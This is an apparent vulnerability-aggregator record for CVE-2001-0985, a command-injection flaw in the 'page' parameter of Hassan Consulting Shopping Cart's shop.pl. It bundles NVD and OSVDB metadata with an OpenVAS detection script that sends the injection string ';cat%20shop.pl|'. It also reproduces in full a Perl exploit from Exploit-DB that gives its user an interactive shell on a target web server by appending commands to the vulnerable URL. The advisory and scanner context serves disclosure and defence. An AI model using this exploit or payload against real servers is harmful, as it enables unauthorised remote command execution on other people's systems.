ID CVE-2001-0985Type cveReporter NVDModified 2017-12-18T21:29:29
Description
shop.pl in Hassan Consulting Shopping Cart 1.23 allows remote attackers to execute arbitrary commands via shell metacharacters in the "page" parameter.
{"id": "CVE-2001-0985", "bulletinFamily": "NVD", "title": "CVE-2001-0985", "description": "shop.pl in Hassan Consulting Shopping Cart 1.23 allows remote attackers to execute arbitrary commands via shell metacharacters in the \"page\" parameter.", "published": "2001-09-08T00:00:00", "modified": "2017-12-18T21:29:29", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0985", "reporter": "NVD", "references": ["http://www.securityfocus.com/bid/3308", "https://exchange.xforce.ibmcloud.com/vulnerabilities/7106", "http://www.irata.com/shopver.html", "http://www.securityfocus.com/archive/1/212827"], "cvelist": ["CVE-2001-0985"], "type": "cve", "lastseen": "2017-12-19T12:21:04", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:hassan_consulting:shopping_cart:1.23"], "cvelist": ["CVE-2001-0985"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "shop.pl in Hassan Consulting Shopping Cart 1.23 allows remote attackers to execute arbitrary commands via shell metacharacters in the \"page\" parameter.", "edition": 1, "enchantments": {"score": {"modified": "2016-09-03T03:06:30", "value": 7.6}}, "hash": "13df75bc1031d3373343fdbcaedc07b1793120abf5b3853397cb4f8554fda7c6", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "34862c3d021b97440c726dc700b27b20", "key": "modified"}, {"hash": "019d96ea584658777a86591ae36113ab", "key": "cvelist"}, {"hash": "55d448f4a1e8d71f2420503afbbe5821", "key": "title"}, {"hash": "bd2356f397fba295859a0b61e800184c", "key": "references"}, {"hash": "cf3fc0f4d0304e01ae517115c5920d78", "key": "description"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "3e415413cddc94fba1abfd9e2a7d2244", "key": "published"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "73b5538cc4829a27b9f000d077f385da", "key": "href"}, {"hash": "26f9b5929e84677d0cf3f76b9bb79d31", "key": "cpe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0985", "id": "CVE-2001-0985", "lastseen": "2016-09-03T03:06:30", "modified": "2008-09-05T16:25:24", "objectVersion": "1.2", "published": "2001-09-08T00:00:00", "references": ["http://www.securityfocus.com/bid/3308", "http://xforce.iss.net/static/7106.php", "http://www.irata.com/shopver.html", "http://www.securityfocus.com/archive/1/212827"], "reporter": "NVD", "scanner": [], "title": "CVE-2001-0985", "type": "cve", "viewCount": 3}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T03:06:30"}], "edition": 2, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "26f9b5929e84677d0cf3f76b9bb79d31"}, {"key": "cvelist", "hash": "019d96ea584658777a86591ae36113ab"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "cf3fc0f4d0304e01ae517115c5920d78"}, {"key": "href", "hash": "73b5538cc4829a27b9f000d077f385da"}, {"key": "modified", "hash": "5c1750a8721533bc5927a12d24bdeda7"}, {"key": "published", "hash": "3e415413cddc94fba1abfd9e2a7d2244"}, {"key": "references", "hash": "eeab2e4c69d4fd46da778337c348bb14"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "55d448f4a1e8d71f2420503afbbe5821"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "fc68ccd369b4a1d43c0fdb256ec58508d6627f2bcc4a4988ede601f744e6781c", "viewCount": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2017-12-19T12:21:04"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:hassan_consulting:shopping_cart:1.23"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"exploitdb": [{"lastseen": "2016-02-02T15:40:57", "osvdbidlist": ["635"], "references": [], "edition": 1, "description": "Hassan Consulting Shopping Cart 1.23 Arbitrary Command Execution Vulnerability. CVE-2001-0985. Remote exploit for cgi platform", "reporter": "Alexey Sintsov", "published": "2001-09-08T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "type": "exploitdb", "title": "Hassan Consulting Shopping Cart 1.23 - Arbitrary Command Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-0985"], "modified": "2001-09-08T00:00:00", "id": "EDB-ID:21104", "href": "https://www.exploit-db.com/exploits/21104/", "sourceData": "source: http://www.securityfocus.com/bid/3308/info\r\n\r\nHassan Consulting's Shopping Cart is commercial web store software.\r\n\r\nShopping Cart does not filter certain types of user-supplied input from web requests. This makes it possible for a malicious user to submit a request which causes arbitrary commands to be executed on the host (with the privileges of the webserver process). For example, special shell characters like \"|\" or \";\" are treated as valid by Shopping Cart.\r\n\r\n\r\n#####################################################\r\n# Shopcart exploit\r\n# Spawn bash style Shell with webserver uid\r\n#\r\n# Spabam 2003 PRIV8 code\r\n# #hackarena irc.brasnet.org\r\n# This Script is currently under development\r\n#####################################################\r\nuse strict;\r\nuse IO::Socket;\r\nmy $host;\r\nmy $port;\r\nmy $command;\r\nmy $url;\r\nmy @results;\r\nmy $probe;\r\nmy @U;\r\nmy $shit;\r\n$U[1] = \"/cgi-local/shop.pl/page=;\";\r\n&intro;\r\n&scan;\r\n&choose;\r\n&command;\r\n&exit;\r\nsub intro {\r\n&help;\r\n&host;\r\n&server;\r\nsleep 3;\r\n};\r\nsub host {\r\nprint \"\\nHost or IP : \";\r\n$host=<STDIN>;\r\nchomp $host;\r\nif ($host eq \"\"){$host=\"127.0.0.1\"};\r\n$shit=\"|\";\r\n$port=\"80\";\r\nchomp $port;\r\nif ($port =~/\\D/ ){$port=\"80\"};\r\nif ($port eq \"\" ) {$port = \"80\"};\r\n};\r\nsub server {\r\nmy $X;\r\nprint \"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\";\r\n$probe = \"string\";\r\nmy $output;\r\nmy $webserver = \"something\";\r\n&connect;\r\nfor ($X=0; $X<=10; $X++){\r\n\t$output = $results[$X];\r\n\tif (defined $output){\r\n\tif ($output =~/Apache/){ $webserver = \"Apache\" };\r\n\t};\r\n};\r\nif ($webserver ne \"Apache\"){\r\nmy $choice = \"y\";\r\nchomp $choice;\r\nif ($choice =~/N/i) {&exit};\r\n }else{\r\nprint \"\\n\\nOK\";\r\n\t};\t\t\r\n}; \r\nsub scan {\r\nmy $status = \"not_vulnerable\";\r\nprint \"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\";\r\nmy $loop;\r\nmy $output;\r\nmy $flag;\r\n$command=\"dir\";\r\nfor ($loop=1; $loop < @U; $loop++) { \r\n$flag = \"0\";\r\n$url = $U[$loop];\r\n$probe = \"scan\";\r\n&connect;\r\nforeach $output (@results){\r\nif ($output =~ /Directory/) {\r\n $flag = \"1\";\r\n\t\t\t $status = \"vulnerable\";\r\n\t\t\t };\r\n\t};\r\nif ($flag eq \"0\") { \r\n}else{\r\n };\r\n};\r\nif ($status eq \"not_vulnerable\"){\r\n\r\n\t\t\t\t};\r\n};\r\nsub choose {\r\nmy $choice=\"0\";\r\nchomp $choice;\r\nif ($choice > @U){ &choose };\r\nif ($choice =~/\\D/g ){ &choose };\r\nif ($choice == 0){ &other };\r\n$url = $U[$choice];\r\n};\r\nsub other {\r\nmy $other = \"/cgi-local/shop.pl/page=;\";\r\nchomp $other;\r\n$U[0] = $other;\r\n};\r\nsub command {\r\nwhile ($command !~/quit/i) {\r\nprint \"\\n[$host]\\$ \";\r\n$command = <STDIN>;\r\nchomp $command;\r\nif ($command =~/quit/i) { &exit };\r\nif ($command =~/url/i) { &choose }; \r\nif ($command =~/scan/i) { &scan };\r\nif ($command =~/help/i) { &help };\r\n$command =~ s/\\s/+/g; \r\n$probe = \"command\";\r\nif ($command !~/quit|url|scan|help/) {&connect};\r\n};\r\n&exit;\r\n}; \r\nsub connect {\r\nmy $connection = IO::Socket::INET->new (\r\n\t\t\t\tProto => \"tcp\",\r\n\t\t\t\tPeerAddr => \"$host\",\r\n\t\t\t\tPeerPort => \"$port\",\r\n\t\t\t\t) or die \"\\nSorry UNABLE TO CONNECT To $host On Port $port.\\n\";\r\n$connection -> autoflush(1);\r\nif ($probe =~/command|scan/){\r\nprint $connection \"GET $url$command$shit HTTP/1.0\\r\\n\\r\\n\";\r\n}elsif ($probe =~/string/) {\r\nprint $connection \"HEAD / HTTP/1.0\\r\\n\\r\\n\";\r\n};\r\n\r\nwhile ( <$connection> ) { \r\n\t\t\t@results = <$connection>;\r\n\t\t\t };\r\nclose $connection;\r\nif ($probe eq \"command\"){ &output };\r\nif ($probe eq \"string\"){ &output };\r\n}; \r\nsub output{\r\nmy $display;\r\nif ($probe eq \"string\") {\r\n\t\t\tmy $X;\r\n\t\t\tfor ($X=0; $X<=10; $X++) {\r\n\t\t\t$display = $results[$X];\r\n\t\t\tif (defined $display){print \"$display\";};\r\n\t\t\tsleep 1;\r\n\t\t\t\t};\r\n\t\t\t}else{\r\n\t\t\tforeach $display (@results){\r\n\t\t\t print \"$display\";\r\n\t\t\t sleep 1;\r\n\t\t\t\t};\r\n };\r\n}; \r\nsub exit{\r\nprint \"\\n\\n\\n\r\nSPABAM 2003.\";\r\nprint \"\\n\\n\\n\";\r\nexit;\r\n};\r\nsub help {\r\nprint \"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\";\r\nprint \"\\n\r\n ShopCart.pl v1.5 by SPABAM 2003\";\r\nprint \"\\n\r\n\";\r\nprint \"\\n Hassan Consulting's Shopping Cart Version 1.18 Exploit\";\r\nprint \"\\n \r\n\r\n(this version is unstable. Require %20 instead space)\r\nnote.. web directory is normally /var/www/html\";\r\nprint \"\\n\";\r\nprint \"\\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)\";\r\nprint \"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\";\r\n};\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21104/"}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "references": [], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[CVE-2001-0985](https://vulners.com/cve/CVE-2001-0985)\nBugtraq ID: 3308\n", "reporter": "OSVDB", "published": "2001-09-08T00:00:00", "title": "Hassan Consulting shop.pl page Parameter Arbitrary Command Execution", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "affectedSoftware": [], "bulletinFamily": "software", "cvelist": ["CVE-2001-0985"], "modified": "2001-09-08T00:00:00", "id": "OSVDB:635", "href": "https://vulners.com/osvdb/OSVDB:635", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2018-09-01T23:35:57", "references": ["http://www.securiteam.com/unixfocus/5QP072K5FK.html"], "pluginID": "136141256231010764", "description": "We detected the presence of the Shopping Cart\n CGI (Hassan). A security problem in this CGI allows execution of arbitrary commands.", "edition": 3, "reporter": "This script is Copyright (C) 2001 SecuriTeam", "published": "2005-11-03T00:00:00", "title": "Shopping Cart Arbitrary Command Execution (Hassan)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0985"], "modified": "2017-04-28T00:00:00", "id": "OPENVAS:136141256231010764", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231010764", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: shopping_cart_information_disclosure.nasl 6046 2017-04-28 09:02:54Z teissa $\n#\n# Shopping Cart Arbitrary Command Execution (Hassan)\n#\n# Authors:\n# Noam Rathaus <noamr@securiteam.com>\n#\n# Copyright:\n# Copyright (C) 2001 Noam Rathaus <noamr@securiteam.com>\n# Copyright (C) 2001 SecuriTeam\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.10764\");\n script_version(\"$Revision: 6046 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-28 11:02:54 +0200 (Fri, 28 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(3308);\n script_cve_id(\"CVE-2001-0985\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Shopping Cart Arbitrary Command Execution (Hassan)\");\n script_category(ACT_ATTACK);\n script_copyright(\"This script is Copyright (C) 2001 SecuriTeam\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"http://www.securiteam.com/unixfocus/5QP072K5FK.html\");\n\n script_tag(name:\"solution\", value:\"Contact the author for a patch.\");\n script_tag(name:\"summary\", value:\"We detected the presence of the Shopping Cart\n CGI (Hassan). A security problem in this CGI allows execution of arbitrary commands.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port( default:80 );\n\nforeach dir( make_list_unique( \"/\", \"/cgi-local\", \"/cgi_bin\", cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n\n url = string( dir, \"/shop.pl/page=;cat%20shop.pl|\" );\n req = http_get( item:url, port:port );\n buf = http_keepalive_send_recv( port:port, data:req );\n\n if( egrep( pattern:\"^#!/.*/perl\", string:buf ) ) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
